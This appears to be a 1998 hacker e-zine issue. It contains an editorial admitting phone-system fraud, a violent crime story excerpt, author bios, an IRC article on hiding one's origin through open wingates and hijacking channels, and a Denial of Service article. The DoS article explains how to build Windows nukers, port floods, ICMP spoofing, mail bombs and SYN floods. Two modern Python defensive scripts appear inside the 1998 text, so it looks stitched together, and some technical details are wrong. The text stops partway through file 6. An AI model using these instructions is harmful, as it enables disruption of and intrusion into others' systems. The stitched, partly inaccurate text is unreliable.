The Discordant Opposition Journal
ISSUE #0 - Nov/98

Thanks to: rOTTEN, ethercat, Gateways, Digital Avatar, Kleptic

'The people's choice for Net Terrorism'

::::::::::: Editor-in-Chief :::: Rue-the-Day :::::::::::
::::::::::: Chief-in-Editor :::: Cronus      :::::::::::
::::::::::: Skull Crusher   :::: Ed          :::::::::::
::::::::::: Ganja Smoker    :::: Niall       :::::::::::
::::::::::: Head Girly      :::: Pinky       :::::::::::

E-Mail discordia@Rue-the-Day.net

:The Discordant Opposition Journal Issue 0, October 1998. All Rights Reserved. Nothing may be reproduced in whole or part without written permission from the editors. The DoJ is made public at irregular periods, but don't worry, you won't miss us.

:Contents:

File
 1 - Editorial                   : Rue-the-Day
 2 - The Decay of Society        : Cronus
 3 - The Waiting Becomes Torture : Rue-the-Day
 4 - Editor Bios'                : Editors
 5 - Surviving IRC               : Rue-the-Day
 6 - Denial of Service           : Cronus
 7 - Interview with Neonsurge    : Cronus
 8 - Mixed up Underground        : Digital Avatar
 9 - Virii Shit                  : Kleptic
10 - Conclusion                  : Editors

:Editorial:

Welcome to issue 0 of the Discordant Opposition's Journal. In this brief editorial I'll be answering important questions like 'just who are the Discordant Opposition anyway?' Naah, I won't really.
What I am going to be writing about, though, is what this Journal is all about (and why you should write an article for it) and 'getting caught' (from personal experience).

Myself and Cronus have been discussing the possibility of getting together a Zine for some time now; I always liked the idea because I love writing. So we finally did it, we affiliated it with the Discordant Opposition (don't ask) and here we are. No amazing story really. Over the next few issues we hope to bring you some interesting, thought provoking articles on various topics. That's where you, the reader, can help us: we can't write enough to fill whole issues, we need reader participation. We'll only release issues when we feel that we have enough decent material to fill them, so we aren't setting ourselves any schedule for releases.

Anyone who knows me knows that I had a bit of trouble over the summer; I want to talk a little about that. There's a moral to the story so read on. I had been using a PBX system to make calls to friends in the US (I'm in Europe) for six months, and I hadn't been caught. I got careless, a security consultant was hired and I was caught. It was all settled by paying the money back, the police were never involved, but it was still all a bit freaky. What I'm basically saying is common sense: just because you haven't been caught doesn't mean you won't, and don't continue to do something if the risk outweighs the goal itself. I was also put in an embarrassing situation while jumping over a wall to go trashing a few weeks ago, but that's a story for some other time.

Play safely kids...

Rue-the-Day [root@Rue-the-Day.net]

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Decay of Society:

Modern society is nothing more than a sprawling cesspool of corrupt and decaying biomatter.
No one has even tried to regulate society or improve upon it since well before the invention of moving electrons. The early Americans were pioneers in society. Setting up a culture that was world respected for decades was no small task. But since the world wars the huge degraded continent has slowly and constantly begun to fade and decline into the realms of modernly acceptable decay. As it has declined, the rest of the world has quickly followed suit. Terrorist nations grasp at this as an opportunity for more self-destructive ideas and actions. Religious cults have shot up with rapid and spontaneous regularity. Freaks and criminals have seized on the widely available source of modern communications for mass annoyance and get-rich-quick ideas.

Moreover, since the US has declined in its state of national affairs, other governments have made conscious efforts to impose like restrictions on their nations. Forced regular advertisement both on TV and in print form. Strong backing for American products over others through the notion that they are somehow more reliable even though their source of origin was clearly nowhere near a place of American jurisdiction. Crime rising in direct proportion with population increases. Mortality rates falling in small, manageable countries such as Britain or France, but rising monstrously in other poorer nations such as Sudan or Mali.

The basis of human life has gradually vanished as we as a society have decided unanimously that abortion and permanent contraception are acceptable in this promiscuous world. Why should we punish for murder and still accept freely the murder on the smaller level of a foetus or an embryo? I am not commenting on abortion and the moralities behind it. I am simply trying to get the reader to think. Why do we still believe in fictional ideas of an all-seeing, all-knowing father figure such as god, when the thought of leprechauns, demons and witches was done away with years ago?
Society still longs for some sort of protection. They still live off the idea that someone is still there watching them and looking after their best interests. God is a fictional character, and it only still exists because society can't give up its overpowering father figure. People need someone to chastise them, look after them and even nurture them. By not realising that they are clinging on to an archaic image, they are living in the past without understanding that the future is clearly what needs to be looked after and protected. Society has to awaken from its age-old slumber and realise that it needs to look after itself and live up to expectations. Drop the phantasmal theories, re-embellish the value of human life and step into the reality that we have created around ourselves...

Long live paranoia...

Cronus [cronus@iol.ie]

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Waiting Becomes Torture:

Small squares of skin were being cut from Levistus's arm with delicate precision. Lev wasn't quite sure whether this was part of the interrogation or just something to get his assigned torturess in the right frame of mind. Either way she seemed happy; she noticed his regained consciousness and a grin flashed across her face. All Lev could think of doing in response was arch an eyebrow; the heavy straps made it impossible to move anything else really. She shrugged and went back to concentrating on his arm.

Pain was something he hadn't felt in quite a while. He'd had most of the pain receptors in his brain fried long ago for the sake of convenience. He'd gotten a cheap job done; his nerves too had been cauterised. It did have its drawbacks though. He'd once almost bled to death before realising that somebody had shot him in the leg. The drawbacks are probably outweighed by the ability to endure almost anything though.
At least in Lev's opinion they are. He did feel a vague tingling in his arm as the scalpel danced over his exposed skin. He almost found himself savouring the meagre sensation. He guessed that this would leave his arm looking like a miniature chessboard or something. What the fuck, another conversation piece. Torture was becoming a ridiculous business, he reflected. What could you do to people who could barely feel? Mind altering drugs were out too, those receptors removed long ago. Only the most potent hallucinogens had any effect on him; LSD gave him a mild headache. He could feel the cold table under his naked body and the warm puddle of blood forming around his left arm. He ignored the discomfort he was feeling and thought back to the Norland Allied Bank job. Where things had started...

***

Levistus' contemporaries lacked initiative when it came to technology. A few pretty basic precautions can do wonders for the operational integrity of a bank robbery. Anything above and beyond the basic and success is almost guaranteed. Levistus handled the tech aspect; the two other members of his crew were Whitie and Mesh. Whitie was a weapon nut, a kind of 21st century samurai. His nickname came from his peroxide white hair and pale complexion. Mesh drove the getaway cars; she was a speed freak in every sense of the two words.

The bank had only had two security guards. Arrogant bastards, they obviously weren't expecting to get hit, their mistake. Levistus and Whitie had walked into the bank exuding confidence. The interior was a stark nightmare of chrome and pale marble all lit by harsh fluorescent lighting. Apparently this was stylish. It wasn't a busy time for the bank; there were only a few individuals queuing and milling around. Two visible security guards. Well before entering the bank Levistus had taken the precaution of knocking out the phone lines in the bank's immediate vicinity. Lev and Whitie sat down on a leather couch supplied for weary bank patrons.
Lev got out his scanner and his earphones and began to listen. It seemed that there was very little police activity in the area. The hissing silence was only occasionally broken by murmured reports of traffic violations and the saga of a messy case of domestic violence. Typical shit really. Dull and mundane.

The second instalment of this story will be in the next issue...

Rue-the-Day [root@Rue-the-Day.net]

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Bios':

Nick: Rue-the-Day
E-mail: root@Rue-the-Day.net

Reason behind nick: Most people who know me would probably agree that an old, archaic English phrase that's fallen into disuse is suitable for me. Actually I do see 'rue' used a fair amount, always brings a smile to my face. Usually in fantasy or sci-fi books, but that's okay. Incidentally 'rue the day' means to regret a past misdeed or action, glad we've got that cleared up. I guess that I have to ask myself two questions; 'What do I want to tell people about me?' and 'What do people want me to tell about myself?'. I think the answer to both is 'as little as possible'.

Brief physical description (for those that care). I'm tall (6'3"), thin and pale. I wear a lot of black, I'm generally the kind of guy that people refuse to sit next to on public transport. It has something to do with my self-perfected aura of menace, I think... I'm involved in the Kevin Mitnick campaign, I'll be talking more about that in future issues, I feel that is very important. At this point I'm primarily interested in hacking although I do still phreak (when I need to). I'm quite fond of Unix, definitely as an alternative to Windows.

Nick: Cronus

Reason for nick: Cronus was a Greek mythological God. He was God of the skies and also ruler of the Titans. The nick is my celestial ego trip...
Background: I got involved with computers at an extremely young age and taught myself to program. This progressed to going on-line for the first time as a teenager. I have been learning and understanding ever since I first sat in front of a computer and the net was simply an outlet for that. I quickly got interested in hacking and my knowledge grew and still is growing.

Ethos: I live by firm ethics of never damaging and never taking money. Victims are not just there, they are man-made.

Areas of interest: Computer security, both Unix and NT. Also programming and freelance web design (something has to pay the bills).

Description: Hmm... tall, big and scary, or so I'm told. My eccentric personality is to my credit and my heavy sense of morals to my advantage.

Current projects: This Zine namely, but also my site is getting a major over-haul; http://homepages.iol.ie/~cronus and I am actively securing a few servers (from the outside).

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Surviving IRC:
By Rue-the-Day
http://www.Rue-the-Day.net/

The focus of this article isn't really 'hacking' IRC in the sense of the word that most people use, though it can be used to give people ideas on ways to exploit flaws on IRC. When I think about hacking I don't just think about things I can use, I also like to try to think about what others may use against me. I spent a fair amount of time on IRC and became familiar with a lot of the pitfalls that people find themselves in, and I decided to write this article to make people aware of them. I'll cover various ways in which you can help to decrease the chances of anything too damaging happening to your system while on IRC. All of this is taken from my own experience [not usually as a victim though]; I hope it helps a few people out.

Your choice of Client.

To connect to irc you need an irc 'client'.
What the client does is provide an interface between you and the IRC server. There are many clients out there but a few are used more than others. My personal choice is 'XiRCON', which I would recommend you check out. Its homepage is http://www.xircon.com and you can also get other stuff to do with it, like scripts, from there. The most popular IRC client is mIRC, but as a consequence there are a lot of well documented security flaws in it; I would not consider it anywhere near as good as XiRCON. Even the latest versions of mIRC can be frozen by 'Hanson' programs and all of the earlier versions are vulnerable to other attacks as well. XiRCON has a lot of nice features: it allows multiple server connections easily and uses tcl for its scripting language, which is also used in X-Windows. Give it a look and see what you think.

Your choice of IRC Scripts.

When you're looking at what you want from an irc script there are some basics that you definitely need, such as a link looker to detect netsplits and rejoins and mass modes for kicking and banning; other options are also good. Most scripts have a lot of features that you would probably never need, and if you want one that does something specific the chances are that it already exists; if you can't find it then write it yourself! Another important feature is a nice and easy wingate connector, but more on that later. A very cool friend of mine once said 'The best script you can have is the one you coded yourself.' and he was right. The script that I use, penance, is one that I've coded some of myself and kludged together from various other scripts that I liked. It has a ctcp cloak, a fake version and general ctcp reply sender, link looker and nethack detector as well as some other stuff. The point is that even though the features it has aren't incredible by any means, I get by with it well.
You don't need everything with bells on because chances are you won't get a chance to use half of it; when it comes down to it, go for practicality over all else. There are loads of script archives available on the web, although a lot of them have very questionable quality stuff to offer. It is also worth noting that popular war scripts like 7th Sphere are now k-lined from most of the big servers. I have also heard that 7th Sphere has a trojan feature which allowed its creators to eavesdrop on people using the script. This is important to consider: many scripts have inbuilt features that you may not be aware of, some will change your username without you being aware of it ['oh, I was wondering why none of my aops were functioning...'] and some allow others to see who else is using the same script on that particular server. Some scripts have sections in them commented out and others have features that will only be obvious from taking the time to glance over the code; take the time to do that - get to know the scripts you use. Some scripts will claim various things like deop protection or ban protection but aren't coded properly and therefore can't do what they claim to; others are full of bugs and shouldn't even be released as beta tests - don't place trust in scripts like this. Choose scripts that work and make sure that the features you'll want to use function as they should.

Wingating.

Anonymity can be hard to achieve on irc; if people know your ident then pretending to be someone else isn't easy. For instance when I'm on irc my ident will be something along the lines of 'Rue-the-Day Rue-the-Da@p155.portlaoise1.tinet.ie'. With just that information you can narrow down my location to Ireland and even within that to an area around the Portlaoise node for tinet. So how would I conceal my location? Wingating. Wingate allows two computers to share a connection; when it is first installed it has certain defaults running.
Like all defaults they aren't necessarily ones that you'd want to leave active, but careless admins leave them running. You can use a wingate to bounce your connection to irc through and therefore appear to be coming from wherever the wingate is set up; for instance I could be 'Rue-the-Day Rue-the-Da@prairienet.nz' or wherever I could find a wingatable connection. You can search for wingates by putting an ip string into a domain or port scanner and scanning for port 23. Domain scanners can be found by searching the web. Once you've found wingatable servers you can then connect to them; this can be done manually or through a script. To connect in mIRC type '/server wingate.ip' and then '/quote irc.chat.net 6667', next type '/quote user blah blah blah@server.net blah' and finally '/quote nick yournick'. The method of connection is similar in XiRCON and there's a script at my site [http://www.Rue-the-Day.net/] that does it as well, written by a friend who wishes to remain anonymous.

Netsplits, Link Looker and Nethack protection.

What is a netsplit? A netsplit is when a specific server [or servers] splits away from the main server. When this happens [and if you have a script with Link Looker built in] you will be notified; some versions also tell you who split off with the server as well. If a person connects to a server that has split and joins a channel that she wishes to hack and nobody else is there, then she will be opd. When the server reconnects she will be opd in the channel and will then have to try to get rid of the other ops. I spent most of my time on DALnet so I'm not sure what it's like on some of the other servers, but when I was there netsplits were very common; we had thirty five at one time once - it was almost every server.
A lot of the XiRCON scripts I've seen [including my own, 'penance'] have 'Nethack protection', which basically monitors for anyone riding in on a split server and deops them or devoices them; it will also warn you if the person joins from a split even if they didn't get oped or whatever. This combined with Link Looker means that you are constantly aware of anything going on to do with netsplits. Bots can also be set up to detect attempted takeovers and defend the channel by deopping the person riding in on the split. With XiRCON you can connect to another server in a different window and so be on both sides of the split at the same time; this is also very handy. It means that you can see what's going on in the channel that you want to take and also who you'll need to deal with to gain control of the channel.

Denial of Service attacks [DoS].

Denial of Service in one of its most basic forms is the 'nuke' or 'icmp bomb'. Although a lot of people out there are patched, it's a continual source of amazement to me the large numbers who aren't. Denial of Service attacks mostly work by sending signals to your computer, an example being OOB [out of band data] which will cause net disconnection, a system error or the closing of certain connections. Ping floods are another common attack used to slow or cut off people's access. When supplied with a target ip a ping flood program will send successive ping requests consuming a huge amount of bandwidth and will either result in lag for the victim or a ping timeout. Patches are available to block the flaws that some of the various DoS attacks use; programs such as 'nukenabber' are also on the web and offer further protection. Port watchers will monitor for attempted DoS attacks and warn you of the attempts; some also log the details of the attack for future reference.
Using Unix to go on IRC makes you invulnerable to a lot of the more common methods of attack out there and gives you access to DoS attacks like LaTierra and commands like ping -f. XiRCON is available for Linux under the name 'ZiRCON' and while I haven't tried it out I've been told that it's pretty cool. While I could go really in depth into the mechanics of how and why DoS attacks work, it would really require a full article to do so. [Psst, check the Zine...]

Precautions you can take.

This is just a bunch of stuff that I've found useful during my time on irc. If somebody asks you for an address that they can email you at and you aren't sure that you trust them not to turn on you and email bomb you at some later date, what do you do? You don't want them to have your actual email address - set up a freemail account and give that address out to people; a usa.net account, like rue-the-day@usa.net, can be gotten at http://netaddress.com/ or a hotmail account can be gotten at http://www.hotmail.com.

Accepting files from people you don't know very well can be dangerous as well; if somebody offers 'nuke protection' or some cool sounding program be very dubious as to its true function. One of the programs that it could in fact be is 'Evilftp', which allows somebody to ftp to your computer through a password protected port and do basically whatever they want to your box, so be wary. Back Orifice is another, and it is simply a good idea not to accept any files from people you don't know.

Some channels have bots or scripts that will send private messages to anyone entering the channel, set up to say things like 'for a list of the files available from the #whatever fileserver type '/who *''. This is a particularly easy 'attack' because it's one you do to yourself. Typing '/who *' gives you a listing of all the people on whatever server you're on, like the whole of DALnet or EFnet or whatever. This completely floods you and results in a dead socket and your disconnection from irc.
A healthy degree of suspicion can be a good thing on irc. I have seen attempted takeovers of channels in which I'm opd by very convincing IRChackers posing as friends. People on DALnet especially are guilty of having far too much faith in the services that the server provides, nickserv and chanserv. For instance, if an enemy of mine decided to use my identity on irc to take over a channel in which I'm a trusted regular, he could use a wingate to approximate my ident. Let's say he managed 'Rue-the-Day Rue-the-Da@dubexs.iol.ie'; now people would see the '.ie' and assume it's me. Anyone from Ireland or who pays attention to such things would know that my isp was 'tinet' not 'iol' and that I wasn't in Dublin, but all it would take is one person to believe it long enough to op the fake 'me' and the channel would be taken. One way to get around this is to do your best to remember people's idents, but then a lot of people spoof and mess around with wingating and vhosting anyway so that isn't too easy to do; some people maintain databases of their friends' idents and can access them easily through irc scripts. That's even easier on servers like Undernet or EFnet where anyone can nuke somebody offline and take over their nick.

Let's say that the channel that the person posing as me wanted to take over was on DALnet and my nick was registered; surely they wouldn't be able to do it, right? Wrong. I have heard of a few ways to hack nickserv and chanserv, some are fact and some are rumour. The easiest way to hack nickserv passwords is to run a bot and bruteforce the person's password with a dictionary based attack. If the person doesn't have nickserv enforcement active then there is nothing to stop you posing as the person; chanserv won't op you until you enter the person's password but it should be easy enough to convince people that chanserv is just lagged or fucked up [all too easy to believe -sigh-] and get them to op you.
Other methods include using database synchs to re-register existing channels; unsubstantiated, but it would be easy enough to prove or disprove with a bot or script. Another method currently being investigated by a friend of mine, Cronus [http://homepages.iol.ie/~cronus], is an attack to flood nickserv and cause it to crash, making it easier to take over channels. If you know of any other ways in which to exploit DALnet services or irc in general I'd be interested in hearing them, please email me any information you have [root@Rue-the-Day.net]!

The Conclusion.

So what am I saying - trust no one? No, I'm just saying that a healthy amount of skepticism doesn't go astray. If you hear from people that somebody is going around posing as channel regulars then be suspicious of people who don't seem right; usually their behaviour gives them away - somebody who's always polite and cool suddenly saying 'op me or dieeeeeee!' is a bit of a dead giveaway. If you take nothing else from this article at least realise that there are dangers on irc; try to be aware of them. I hope this helped people to think about it a little more. Speaking of helping people out, I'd really appreciate it if anyone out there who knows of flaws or exploits in the various Java chat applets or CGI scripts which allow web based chat would email me [root@Rue-the-Day.net] with them for an article I'm writing. Thanks.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Denial of Service:
by Cronus

*Introduction

Denial of Service attacks are extremely useful and somewhat degrading attacks run over the net. In this article I will explain the different types of DoS attacks, their effectiveness and the sub-culture that is associated with them. This file aims to teach you about the different types of attack, how to code them and how to guard against them.
*Explanation

Denial of Service attacks are specific attacks that can be run over the Internet or over a phone line. They attempt to shut down or seriously slow down a service provided by a computer system. By setting up fake connections, exploiting a flaw or flooding a computer with data packets, the attack attempts to close the computer down and shut off its services.

*Ping of Denial

The primary and oldest denial of service attack. It is the most original attack and still the most widely used. Essentially the notorious Ping of Death is an attack that slows down the reaction time of the server that is being attacked.

Ping is a technical term used on the net. When you ping a server you send a ping signal to it. The server receives the ping command and responds with a pong signal. Your computer keeps a record of the time taken between the ping being sent and the pong being received. The time taken for the reply is considered the ping time, and that is considered the lag of the server. The Ping of Death attack simply floods the server under attack with ping requests and lags the server so badly that all its services are seriously slowed down or at worst totally cancelled out. An effective ping attack can actually shut down the server for as long as the attack is maintained.

Protection from the mighty Ping of Death isn't all that simple. All net computers at the moment need to have ping capabilities. On IRC, for instance, no ping reply to the IRC server will cause you to be disconnected. Some more modern OS releases come with larger ping buffers in order to catch attempted attacks. They buffer the attacks before replying; this gives them enough time to either send a reply or realise that it's an attack and close the port. But again, making the computer think that you are attacking can be good enough to knock a server offline.

*Out of Bandwidth

This attack is sometimes referred to as a Win Nuker. Windows uses specific Internet software to operate its network connections.
This is called NetBIOS. Rhino9 have done an excellent file on NetBIOS and its flaws. It is particularly vulnerable on ports 137, 138 and 139. Connection to them can cause serious errors in Windows. NT has been known to crash with these flaws and 95 has been reported to freeze or lose the net connection.

Out of Bandwidth is a standard error message that is used by NetBIOS. It essentially tells the computer that there is no more space for the computer's net connection. The computer thinks that the signal was received from the Internet provider and so drops the line. If you send random data to any of these ports, it is very likely that the computer will freeze or crash. Coding a Nuker such as this is extremely simple. Simply write a program that connects to a target IP on either port 137 or 139. Then it should send random data to the open port, followed by the OOB message.

There are patches for this old Windows flaw available from the Microsoft site. Windows is the only OS that is vulnerable. By updating your version of Winsock you will patch that hole and protect your computer. Because Windows is the only OS that is susceptible to this attack and the fact that a patch is available, it is a somewhat obsolete attack. Nevertheless many Windows computers are still unpatched and for that reason it can still be used against certain systems.

*ICMP

ICMP is a protocol that doesn't require a connection the way TCP does. You don't actually have to be connected to a computer in order to send it ICMP packets. This protocol is mainly used to set up connections, send error messages and monitor Internet connections. It is possible to set up an attack using only ICMP error messages.
There are several ICMP messages that can be used to close an Internet connection, such as:

· DESTINATION UNREACHABLE
· TIME TO LIVE EXCEEDED
· PARAMETER PROBLEM
· PACKET TOO BIG
· SOURCE QUENCH

If you were to send one of these messages to an open ICMP port, it would have the effect of closing the connection and disconnecting the computer from the Internet. Of course you would have to spoof the source address in order for the server to think the message came from the ISP.

Certain systems are more vulnerable than others. Windows by default has ICMP redirect turned off. This makes it perfectly protected from this type of attack. However, most systems, including UNIX, have redirect turned on. This is because it can be very useful and necessary for a fast net connection. But if you feel at risk it might be necessary to close the ports that are affected. Some research on the topic will get you more information on what you can do to secure your specific machine.

*Fragmentation

The most modern type of net attack is fragmentation. This can be used on most systems quite easily. It is a new attack and is still not used that widely. Essentially this attack revolves around IP data packets. Whenever a computer sets up a net connection, it uses data packets to communicate with other computers on the net. This attack sends data packets to a computer that are deliberately fragmented. The packets are incomplete in their content. The computer that receives the fragmented packets sets up a routine to listen for the rest of the packets, while your attack stops sending those packets and starts to send another thread of fragmented packets. As the number of threads builds, the computer under attack slows down and will eventually crash or drop the net connection.

Coding a program to do this would require a high degree of programming knowledge. On a UNIX machine you will need to have root access to run an attack like this, because you will need to have raw access to the ports.
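The ICMP section above notes that a spoofed error message only works if the receiving host believes it. The check below, an added example in Python and not code from the article, is the defence a host stack can apply: every ICMP error carries a copy of the IP header and the first eight bytes of the datagram it claims to be about, so the host can refuse to act on the error unless that quoted datagram matches a connection it actually has open. The connection table, addresses and ports are constructed; the type numbers are the standard ICMP ones.

```python
import socket
import struct

# Constructed table of this host's live TCP connections:
# (local_ip, local_port, remote_ip, remote_port).
ACTIVE_CONNECTIONS = {
    ("10.0.0.5", 40000, "192.0.2.10", 6667),  # constructed IRC session
    ("10.0.0.5", 40001, "192.0.2.20", 25),    # constructed SMTP session
}

# ICMP error types from the list above (type numbers from RFC 792).
ICMP_ERROR_TYPES = {
    3: "destination unreachable",
    4: "source quench",
    11: "time exceeded",
    12: "parameter problem",
}
IPPROTO_TCP = 6

def build_ipv4_header(src, dst, proto=IPPROTO_TCP, total_len=40):
    """Minimal 20-byte IPv4 header, no options, checksum left as zero."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))

def build_icmp_error(icmp_type, code, inner_src, inner_dst, sport, dport):
    """An ICMP error as it arrives on the wire: 8-byte ICMP header, then the
    IP header and first 8 bytes (ports + sequence) of the datagram it claims
    to be about. Checksums are left zero; the check below does not use them."""
    inner = build_ipv4_header(inner_src, inner_dst) + struct.pack("!HHI", sport, dport, 0)
    return struct.pack("!BBHI", icmp_type, code, 0, 0) + inner

def classify_icmp_error(packet, connections=ACTIVE_CONNECTIONS):
    """Decide whether an inbound ICMP error may act on a socket.

    Only 'accept' may affect a connection. The quoted datagram must be one
    this host sent (so its source is our local end) and its ports must match
    a connection we have open; anything else is noise or a spoof and is dropped.
    """
    if len(packet) < 8 + 20 + 8:
        return "drop: truncated"
    icmp_type = packet[0]
    if icmp_type not in ICMP_ERROR_TYPES:
        return "ignore: not an error message"
    inner = packet[8:]
    ver_ihl, proto = inner[0], inner[9]
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(inner) < ihl + 8:
        return "drop: malformed quoted header"
    if proto != IPPROTO_TCP:
        return "ignore: quoted datagram is not TCP"
    src = socket.inet_ntoa(inner[12:16])
    dst = socket.inet_ntoa(inner[16:20])
    sport, dport = struct.unpack("!HH", inner[ihl:ihl + 4])
    if (src, sport, dst, dport) in connections:
        return "accept"
    return "drop: no matching connection (spoofed or stale)"

if __name__ == "__main__":
    genuine = build_icmp_error(3, 1, "10.0.0.5", "192.0.2.10", 40000, 6667)
    forged = build_icmp_error(3, 1, "10.0.0.5", "192.0.2.10", 40005, 6667)
    print("genuine:", classify_icmp_error(genuine))
    print("forged: ", classify_icmp_error(forged))
```

Because the attacker must guess the full four-tuple (and, on stacks that also compare the quoted sequence number, a plausible sequence) for the error to be accepted, blind spoofing from outside the path is far harder than the article's description suggests, which is why modern stacks treat most of these messages as soft errors for established connections rather than tearing them down.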
You will need to code in a low level language for a Windows machine. You will also need to develop some means of optimisation that allows you to set-up multiple threads to speed up the attack. This attack should be effective on most operating systems. Although some protection have been set-up on some systems, most of them are still susceptible. Even ones that have protection should be vulnerable. While some systems will buckle faster then others, they will all buckle soon enough as long as you maintain the attack for long enough and your connection is fast enough. *E-Mail Bombing While this isn't always considered a denial of service attack. I decided to include it in this file as it can be used as a very effective DoS attack. While mail bombing is only usually used as a form of revenge or retribution, it can be used to crash a server in order to run a successful denial attack. If you wanted to crash a server, you might find in your research that it handles the SMTP protocol. This would open up the possibilities of mail bombing the server. If you were to bomb the target computer with a huge amount of mail messages, you might be able to flood the computer and choke up its hard drive space. The more space you take up, the more lagged the server will become and if you keep up your attack you will eventually cause the computer to crash due to lack of HD space. There isn't really any way of protecting against a mail bomb attack. If your computer needs to have mail capabilities, you can't close the mail ports. It is possible to set up a mail buffer to try and catch the attack. All operating systems are vulnerable to an attack of this sort. But more modern systems are set up in more advanced ways in order to catch possible attacks, but no way is perfectly secure. *Specific Flaws All operating systems have been found to contain security holes. Some of this holes can cause simply annoyances, others are serious flaws in the system that can cause it to crash or freeze. 
If you are aware of the system that you are attacking, then you will be able to find a hole in that system to exploit. Windows NT is one of the most modern server software packages that has been released. It can turn a normal computer into an Internet Server. This drastic upgrade means that it has become very popular among small companies that need to run a low cost server on the net. It has several very well documented holes that can be used against it. Certain UNIX routines are known to contain flaws that can exploited without actually have access to the server. They can be accessed over the Internet making an attack very easy. Certain deamons such as sendmail are widely known to contain flaws in its programming. Searching for these exploits would give you the direct capabilities to attack the server. Research over the net would be the best way to find exploits for specific systems. While most DoS attacks are general attacks, that need to be directed at a certain OS, some are unique and these need to be researched. *Port Flooding Port flooding is when your attack centres around flooding a certain port with multiple connections. This attack specifically floods a port with so many connections that the target computer is severely lagged that it starts to drop its other connections. UNIX machines have a process table that contains a list of all the programs that are currently running on the machine. If you were to flood the process table with dozens of invocations of a specific program, you will start to slow the sever response time down. For instance, if your attack were to make multiple connections to port 25 on a UNIX machine. You would flood the process table with lots of invocations of the sendmail program. This will soon start to disconnect other connections. And as the other programs die off, the attack would flood the free space, this would mean that the computer wouldn't be able to host any more connections or internal programs. 
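
From the server's side, the parked-connection flood described above shows up in its own connection table long before the process table fills. The following is an added example, not from Cronus's file: it parses constructed netstat-style lines (the columns proto, recv-q, send-q, local address, foreign address and state are assumed) and flags a single peer holding many idle connections to one service port, as in the sendmail case above; since the same table also exposes half-open handshakes, it counts SYN_RECV entries per port as well.

```python
"""Spot a port flood in a netstat-style connection table.

Added example, not part of the original article. Two patterns are flagged:
one peer holding many idle ESTABLISHED connections to a single service
port (e.g. parked sendmail sessions on 25), and a pile of half-open
SYN_RECV entries on one port.
"""
from collections import Counter

# Constructed sample: a normal mail peer, one peer parking 6 idle sessions
# on port 25, a burst of half-open handshakes on port 80, one ssh session.
SAMPLE_NETSTAT = """\
tcp        0      0 10.0.0.5:25        198.51.100.7:33412   ESTABLISHED
tcp        0      0 10.0.0.5:25        192.0.2.44:40001     ESTABLISHED
tcp        0      0 10.0.0.5:25        192.0.2.44:40002     ESTABLISHED
tcp        0      0 10.0.0.5:25        192.0.2.44:40003     ESTABLISHED
tcp        0      0 10.0.0.5:25        192.0.2.44:40004     ESTABLISHED
tcp        0      0 10.0.0.5:25        192.0.2.44:40005     ESTABLISHED
tcp        0      0 10.0.0.5:25        192.0.2.44:40006     ESTABLISHED
tcp        0      0 10.0.0.5:80        203.0.113.9:1024     SYN_RECV
tcp        0      0 10.0.0.5:80        203.0.113.10:1025    SYN_RECV
tcp        0      0 10.0.0.5:80        203.0.113.11:1026    SYN_RECV
tcp        0      0 10.0.0.5:80        203.0.113.12:1027    SYN_RECV
tcp        0      0 10.0.0.5:22        198.51.100.7:51000   ESTABLISHED
"""


def parse_netstat(text):
    """Yield (local_port, peer_ip, state) for each TCP line; skip headers and noise."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        local, foreign, state = fields[3], fields[4], fields[5]
        # rsplit so an IPv6 literal containing ':' still splits on the last one
        local_port = int(local.rsplit(":", 1)[1])
        peer_ip = foreign.rsplit(":", 1)[0]
        yield local_port, peer_ip, state


def find_floods(text, per_peer_limit=5, half_open_limit=3):
    """Return {'port_floods': [(peer, port, count)], 'half_open': {port: count}}.

    per_peer_limit: ESTABLISHED connections one peer may hold to one port.
    half_open_limit: SYN_RECV entries tolerated on one port.
    """
    per_peer = Counter()
    half_open = Counter()
    for port, peer, state in parse_netstat(text):
        if state == "SYN_RECV":
            half_open[port] += 1
        elif state == "ESTABLISHED":
            per_peer[(peer, port)] += 1
    port_floods = sorted(
        (peer, port, n) for (peer, port), n in per_peer.items() if n >= per_peer_limit
    )
    half_open_hits = {port: n for port, n in half_open.items() if n >= half_open_limit}
    return {"port_floods": port_floods, "half_open": half_open_hits}


if __name__ == "__main__":
    report = find_floods(SAMPLE_NETSTAT)
    for peer, port, n in report["port_floods"]:
        print("port flood: %s holds %d connections to port %d" % (peer, n, port))
    for port, n in report["half_open"].items():
        print("half-open flood: %d SYN_RECV entries on port %d" % (n, port))
```

On a live box the same function can be fed the output of `netstat -tn`; the thresholds are starting points to tune against the host's normal load.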
A port flooding program can very easily be written. It would connect to the target computer with as many connections as your computer can handle. You would need to maintain the flooding for as long as the attack was necessary. If the program was starting sendmail routines, it would simply connect to the target computer on port 25 and then hold the connection without sending any data. The attack would hold the connection till the target computer cut you off.

*SYN Flooding

The SYN - ACK protocol is a 3-way handshake for setting up Internet connections. A computer sends a SYN packet to the server. The server receives the SYN and responds with an ACK packet. The connection is now set up and running. The SYN flooding attack is based on an incomplete handshake. The attacker sends a SYN packet from his computer to the server under attack. The server responds with an ACK packet to acknowledge the connection. Then the attack would simply send another SYN packet and wait for the server to respond. By flooding the server with connections that don't actually send any information, you will start to lag it and perhaps even crash it. The Internet stack will wait a certain amount of time before dropping the connection; a SYN flooding attack will therefore keep setting up connections faster than the computer under attack can drop them, and by doing so can crash the server quite easily.

